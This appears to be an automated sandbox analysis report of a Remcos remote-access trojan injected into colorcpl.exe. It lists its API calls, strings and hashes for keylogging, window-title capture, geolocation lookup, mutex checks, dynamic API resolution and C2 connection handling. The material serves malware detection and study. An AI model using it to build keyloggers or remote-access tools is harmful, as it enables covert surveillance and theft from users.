3094f95 46858->46859 46860 3091fb8 11 API calls 46859->46860 46860->46850 46862 30948c6 46861->46862 46863 30948ce 46862->46863 46867 30949fb 46862->46867 46864 30952fe 28 API calls 46863->46864 46881 3094903 46863->46881 46911 309495e 46863->46911 46866 30948ef 46864->46866 46869 3092073 28 API calls 46866->46869 46870 3094912 46867->46870 46871 3094a16 46867->46871 46867->46911 46868 309490b 46868->46870 46872 3094921 46868->46872 46873 30948fe 46869->46873 46875 3092073 28 API calls 46870->46875 46967 
30aa86b 30 API calls 46871->46967 46878 3094930 46872->46878 46879 3094967 46872->46879 46876 30a94da 79 API calls 46873->46876 46880 3094a60 46875->46880 46876->46881 46877 3094a20 46882 30952dd 28 API calls 46877->46882 46883 3092073 28 API calls 46878->46883 46964 30af7f5 54 API calls 46879->46964 46884 3092073 28 API calls 46880->46884 46962 30aea15 27 API calls 46881->46962 46886 3094a30 46882->46886 46888 309493f 46883->46888 46889 3094a6f 46884->46889 46887 3092073 28 API calls 46886->46887 46891 3094a3f 46887->46891 46892 3092073 28 API calls 46888->46892 46893 30a94da 79 API calls 46889->46893 46890 309496f 46894 30949a4 46890->46894 46895 3094974 46890->46895 46897 30a94da 79 API calls 46891->46897 46898 309494e 46892->46898 46893->46911 46966 30aebbb 28 API calls 46894->46966 46896 3092073 28 API calls 46895->46896 46900 3094983 46896->46900 46901 3094a44 46897->46901 46902 30a94da 79 API calls 46898->46902 46904 3092073 28 API calls 46900->46904 46905 3091fb8 11 API calls 46901->46905 46906 3094953 46902->46906 46903 30949ac 46907 30949d9 CreateEventW 46903->46907 46909 3092073 28 API calls 46903->46909 46908 3094992 46904->46908 46905->46911 46963 30ac4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46906->46963 46907->46911 46910 30a94da 79 API calls 46908->46910 46913 30949c2 46909->46913 46914 3094997 46910->46914 46911->46185 46915 3092073 28 API calls 46913->46915 46965 30aee67 52 API calls 46914->46965 46917 30949d1 46915->46917 46918 30a94da 79 API calls 46917->46918 46919 30949d6 46918->46919 46919->46907 46968 30a9797 GlobalMemoryStatusEx 46920->46968 46922 30a97d6 46922->46185 46969 30a2fd6 46923->46969 46927 30a9adc GetTickCount 46926->46927 46927->46185 46929 30c4c30 ___scrt_fastfail 46928->46929 46930 30a9a98 GetForegroundWindow GetWindowTextW 46929->46930 46931 309415e 28 API calls 46930->46931 46932 30a9abe 46931->46932 46932->46185 46934 3092073 28 API calls 46933->46934 46935 309e2e0 46934->46935 46935->46185 

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0309935B
                                                              • SetWindowsHookExA.USER32(0000000D,0309932C,00000000), ref: 03099369
                                                              • GetLastError.KERNEL32 ref: 03099375
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 030993C3
                                                              • TranslateMessage.USER32(?), ref: 030993D2
                                                              • DispatchMessageA.USER32(?), ref: 030993DD
                                                              Strings
                                                              • Keylogger initialization failure: error , xrefs: 03099389
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                              • String ID: Keylogger initialization failure: error
                                                              • API String ID: 3219506041-952744263
                                                              • Opcode ID: c5f3f0135a66b1a647d343ffc855d05720416a2b7b0c965bd09553cabf7d615c
                                                              • Instruction ID: 8a4f791e09c7e7785422d2f9b0359b0ff4b2931994d2c0a0b9a522166c63a3d9
                                                              • Opcode Fuzzy Hash: c5f3f0135a66b1a647d343ffc855d05720416a2b7b0c965bd09553cabf7d615c
                                                              • Instruction Fuzzy Hash: F311C135706305ABEB10FBB5EC0986F77ECEBD9A11B104A6EF891C6584EB358500C7A5

                                                              Control-flow Graph

                                                              APIs
                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 030A9392
                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 030A93A8
                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 030A93C1
                                                              • InternetCloseHandle.WININET(00000000), ref: 030A9407
                                                              • InternetCloseHandle.WININET(00000000), ref: 030A940A
                                                              Strings
                                                              • http://geoplugin.net/json.gp, xrefs: 030A93A2
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                              • String ID: http://geoplugin.net/json.gp
                                                              • API String ID: 3121278467-91888290
                                                              • Opcode ID: 22f552de110471556c57d515bee35dbd59571bd198c3ac40ca62adf74400925a
                                                              • Instruction ID: af6d5915f3a9fe9bc9fdc004ec1b1d81b2190aa746d61052b5745393ddd5f7f9
                                                              • Opcode Fuzzy Hash: 22f552de110471556c57d515bee35dbd59571bd198c3ac40ca62adf74400925a
                                                              • Instruction Fuzzy Hash: 7F1182357073166BD624EB25AC48DEF7EECEFC5660F00043DF90596281DB659804C6A5

                                                              Control-flow Graph

                                                              APIs
                                                              • GetForegroundWindow.USER32(03102008,?,03102008), ref: 0309949C
                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 030994A7
                                                              • GetKeyboardLayout.USER32(00000000), ref: 030994AE
                                                              • GetKeyState.USER32(00000010), ref: 030994B8
                                                              • GetKeyboardState.USER32(?), ref: 030994C5
                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 030994E1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                              • String ID:
                                                              • API String ID: 3566172867-0
                                                              • Opcode ID: 105ddeb08a082523fc587e92aecc47af99d3a13ce1a0cde3e9bfb84cbce61321
                                                              • Instruction ID: c254eddf1c8b907763d996bb442b33ed3c5d91d3dd97ffa2176dcedf6c4cbb10
                                                              • Opcode Fuzzy Hash: 105ddeb08a082523fc587e92aecc47af99d3a13ce1a0cde3e9bfb84cbce61321
                                                              • Instruction Fuzzy Hash: 19115272A0120CABDB10EBF4EC49FDA77BCEB5C711F000455F604DB184E676AD548BA4

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 030A1F34: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 030A1F54
                                                                • Part of subcall function 030A1F34: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,03102200), ref: 030A1F72
                                                                • Part of subcall function 030A1F34: RegCloseKey.KERNEL32(?), ref: 030A1F7D
                                                              • Sleep.KERNEL32(00000BB8), ref: 0309E243
                                                              • ExitProcess.KERNEL32 ref: 0309E2B4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                              • String ID: 3.8.0 Pro$override$pth_unenc
                                                              • API String ID: 2281282204-3177840460
                                                              • Opcode ID: d3acdf1f972e603bae62c49a63af5ca0c9f919fb4459945b35463e41a92a79d8
                                                              • Instruction ID: 1645494599b7957733ae6da9aba62a1a210cb8dfdb9ced6a7ce49f8c39233081
                                                              • Opcode Fuzzy Hash: d3acdf1f972e603bae62c49a63af5ca0c9f919fb4459945b35463e41a92a79d8
                                                              • Instruction Fuzzy Hash: 88212734B527042FEE08F6BD9C16BEF368DABD1600F400819E9165F2C6EEB59E0183D2
                                                              APIs
                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,030C1372,00000024,?,?,?), ref: 030C15FE
                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,030BB81F,?), ref: 030C1614
                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,030BB81F,?), ref: 030C1626
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                              • String ID:
                                                              • API String ID: 1815803762-0
                                                              • Opcode ID: e1758db6c071d6f3988b17d14dcaaeb3a3dca8036e64fd80d545462bc3667441
                                                              • Instruction ID: a378f8dea9cb78798d65f5831f7783cf2853cdbc0a4dbfba2f7ea69d5007ce31
                                                              • Opcode Fuzzy Hash: e1758db6c071d6f3988b17d14dcaaeb3a3dca8036e64fd80d545462bc3667441
                                                              • Instruction Fuzzy Hash: F6E0123131A260BAEB749F15BC08F5B2A99EB89B72F290A2DF155E90D8D7624840855C
                                                              APIs
                                                              • GetComputerNameExW.KERNEL32(00000001,?,00000037,03101FFC), ref: 030A9615
                                                              • GetUserNameW.ADVAPI32(?,00000010), ref: 030A962D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Name$ComputerUser
                                                              • String ID:
                                                              • API String ID: 4229901323-0
                                                              • Opcode ID: 417a71fa0a5cf22442fda67ae5b35424539a56c96b83d9d22b2fc8c3941ec2e7
                                                              • Instruction ID: 8cd506476fc6c8599c66cc30645379c3842ab3d439201a470152ca1b9481b19d
                                                              • Opcode Fuzzy Hash: 417a71fa0a5cf22442fda67ae5b35424539a56c96b83d9d22b2fc8c3941ec2e7
                                                              • Instruction Fuzzy Hash: 3301627690121CAFDF04EBD4DC44EDEB7BCAF44314F000166E505BA154EEB46A89DB94
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,030A3F34,03101E78,03102910,03101E78,00000000,03101E78,00000000,03101E78,3.8.0 Pro), ref: 0309E2CF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 246163e167ddd273ff7c0b3eaba2358d04f3f45c7e97148971392ecf78fb5710
                                                              • Instruction ID: 9c09c3a834eb762114374a850475409b11aeeb37f87f6ba67aece1c0d7680944
                                                              • Opcode Fuzzy Hash: 246163e167ddd273ff7c0b3eaba2358d04f3f45c7e97148971392ecf78fb5710
                                                              • Instruction Fuzzy Hash: 31D05B3074521C77E910D6859C0AEAB779CD741A62F000156B904D7280D9E16E0487D1

                                                              Control-flow Graph

                                                              APIs
                                                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0309D40C), ref: 030AA8EF
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA8F8
                                                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0309D40C), ref: 030AA90F
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA912
                                                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0309D40C), ref: 030AA924
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA927
                                                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0309D40C), ref: 030AA93D
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA940
                                                              • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0309D40C), ref: 030AA951
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA954
                                                              • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0309D40C), ref: 030AA969
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA96C
                                                              • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0309D40C), ref: 030AA97D
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA980
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0309D40C), ref: 030AA98C
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA98F
                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0309D40C), ref: 030AA9A1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9A4
                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0309D40C), ref: 030AA9B1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9B4
                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0309D40C), ref: 030AA9C5
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9C8
                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0309D40C), ref: 030AA9D5
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9D8
                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0309D40C), ref: 030AA9EA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9ED
                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0309D40C), ref: 030AA9FA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9FD
                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0309D40C), ref: 030AAA0A
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AAA0D
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0309D40C), ref: 030AAA1F
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AAA22
                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0309D40C), ref: 030AAA30
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AAA33
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0309D40C), ref: 030AAA40
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AAA43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule$LibraryLoad
                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                                              • API String ID: 551388010-2474455403
                                                              • Opcode ID: e3174a583557d468c83809b0d1c9f21601f2922ca19cffd8ab8dc9be103356be
                                                              • Instruction ID: 9a9a3041befd50dd566d890101008ba14bcaadac710c3813bdb50a99f5716c69
                                                              • Opcode Fuzzy Hash: e3174a583557d468c83809b0d1c9f21601f2922ca19cffd8ab8dc9be103356be
                                                              • Instruction Fuzzy Hash: 45317564E4639CBECA14FBBA6C49E1F3E9CE9487587420526F214E7906DBBC9440CE74

                                                              Control-flow Graph

                                                              [Control-flow graph of the function at 309d3f0, rendered as an image in the original report (edges marked executed / not executed). API calls visible in the graph: GetModuleFileNameW, OpenMutexA, WaitForSingleObject, CloseHandle, CreateMutexA, GetLastError, CreateThread, SetProcessDEPPolicy.]
                                                              APIs
                                                                • Part of subcall function 030AA8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0309D40C), ref: 030AA8EF
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA8F8
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0309D40C), ref: 030AA90F
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA912
                                                                • Part of subcall function 030AA8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0309D40C), ref: 030AA924
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA927
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0309D40C), ref: 030AA93D
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA940
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0309D40C), ref: 030AA951
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA954
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0309D40C), ref: 030AA969
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA96C
                                                                • Part of subcall function 030AA8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0309D40C), ref: 030AA97D
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA980
                                                                • Part of subcall function 030AA8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0309D40C), ref: 030AA98C
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA98F
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0309D40C), ref: 030AA9A1
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9A4
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0309D40C), ref: 030AA9B1
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9B4
                                                                • Part of subcall function 030AA8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0309D40C), ref: 030AA9C5
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9C8
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0309D40C), ref: 030AA9D5
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9D8
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0309D40C), ref: 030AA9EA
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9ED
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0309D40C), ref: 030AA9FA
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9FD
                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0309D603
                                                                • Part of subcall function 0309F98D: __EH_prolog.LIBCMT ref: 0309F992
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                                              • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\colorcpl.exe$Exe$Inj$Remcos Agent initialized$Software\$User$exepath$licence$license_code.txt$origmsc
                                                              • API String ID: 1529173511-3534803471
                                                              • Opcode ID: 14b564ff7802cb71a5247a92fdf9e9ab3caa68eb149388c678dee0b186a63afd
                                                              • Instruction ID: 4f5fe13ae9a1249a1bcbb6e76f7a4f736189618b494651a249a41d8c0b88c54e
                                                              • Opcode Fuzzy Hash: 14b564ff7802cb71a5247a92fdf9e9ab3caa68eb149388c678dee0b186a63afd
                                                              • Instruction Fuzzy Hash: 0122F478B4734A2FFE19F7B49C25BBE26998FC5600F04086FA5429F2D2DF688D05A351

                                                              Control-flow Graph

                                                              [Control-flow graph of the function at 30a3980, rendered as an image in the original report (edges marked executed / not executed). API calls visible in the graph: Sleep, WSAGetLastError, GetTickCount, CreateThread.]
                                                              APIs
                                                              • Sleep.KERNEL32(00000000,00000029,771B0F10,03101FFC,00000000), ref: 030A39D1
                                                              • WSAGetLastError.WS2_32(00000000,00000001), ref: 030A3BE2
                                                              • Sleep.KERNEL32(00000000,00000002), ref: 030A44C7
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep$ErrorLastLocalTime
                                                              • String ID: | $%I64u$3.8.0 Pro$C:\Windows\SysWOW64\colorcpl.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                                              • API String ID: 524882891-3810641973
                                                              • Opcode ID: 6618f5efe88a992265a8fd181ff2b95a5949099d7cf0ae9ae8d37277f76a2f87
                                                              • Instruction ID: 0be0ac8d0d7b3b3403dc7d18b9da10d9acb617a8270a8113dcebbc31e801dc4b
                                                              • Opcode Fuzzy Hash: 6618f5efe88a992265a8fd181ff2b95a5949099d7cf0ae9ae8d37277f76a2f87
                                                              • Instruction Fuzzy Hash: 3142AF39B462195FEF18F7A4ECA1AEEB3699FD4200F1045AAD00A6F1D1EF305F46DA50

                                                              Control-flow Graph

                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 03099C81
                                                              • Sleep.KERNEL32(000001F4), ref: 03099C8C
                                                              • GetForegroundWindow.USER32 ref: 03099C92
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 03099C9B
                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 03099CCF
                                                              • Sleep.KERNEL32(000003E8), ref: 03099D9D
                                                                • Part of subcall function 0309962E: SetEvent.KERNEL32(?,?,?,0309A77B,?,?,?,?,?,00000000), ref: 0309965A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                              • API String ID: 911427763-3954389425
                                                              • Opcode ID: b74aa470fdac89ef759234107034f577691677e42b559bf269c1324599ae7310
                                                              • Instruction ID: 677f9a5fdc0c0ef02467eff8fa2babcb716ded19f35d83000193b7e55d71a510
                                                              • Opcode Fuzzy Hash: b74aa470fdac89ef759234107034f577691677e42b559bf269c1324599ae7310
                                                              • Instruction Fuzzy Hash: 8951017930A3449FEB08FB74D894AAEB7E9ABD4204F04095FF0868E1D0EF749945D792

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0309C753
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                              • API String ID: 82841172-425784914
                                                              • Opcode ID: fcd7368b2715fd605e6f6da12417ca100786f20fc913b264ad0aa8c28be56afb
                                                              • Instruction ID: 6b91b4e5c33f2c7ce38fceb67fafed536155c62ca1b5b464be6c800bb93bc3a8
                                                              • Opcode Fuzzy Hash: fcd7368b2715fd605e6f6da12417ca100786f20fc913b264ad0aa8c28be56afb
                                                              • Instruction Fuzzy Hash: 9541B67960A3019FFA08F765DC51DFFF3E8AEE0610F00092FF1525A0A1EF60990AE652

                                                              Control-flow Graph

                                                              [Control-flow graph of the function at 30a44da, rendered as an image in the original report (edges marked executed / not executed). API calls visible in the graph: SetEvent, GetTickCount, StrToIntA, SetWindowTextW, CreateThread, ShowWindow, SetForegroundWindow.]
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CountEventTick
                                                              • String ID: hlight
                                                              • API String ID: 180926312-4166879102

                                                              APIs
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,030A5824,?,00000001,00000000,00000000), ref: 030949E0
                                                              Similarity
                                                              • API ID: CreateEventLocalTime
                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                              • API String ID: 2082726707-2151626615

                                                              APIs
                                                                • Part of subcall function 030A9F23: GetCurrentProcess.KERNEL32(?,?,?,0309C663,WinDir,00000000,00000000), ref: 030A9F34
                                                                • Part of subcall function 030A1F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,00000000,00000000,00000000), ref: 030A1FB5
                                                                • Part of subcall function 030A1F91: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 030A1FD2
                                                                • Part of subcall function 030A1F91: RegCloseKey.KERNEL32(00000000), ref: 030A1FDD
                                                              • StrToIntA.SHLWAPI(00000000,030F9710,00000000,00000000,00000000,03101FFC,00000001,?,?,?,?,?,?,0309D6A0), ref: 030A9327
                                                              Similarity
                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                              • API String ID: 1866151309-2070987746

                                                              APIs
                                                              • Sleep.KERNEL32(00001388), ref: 03099738
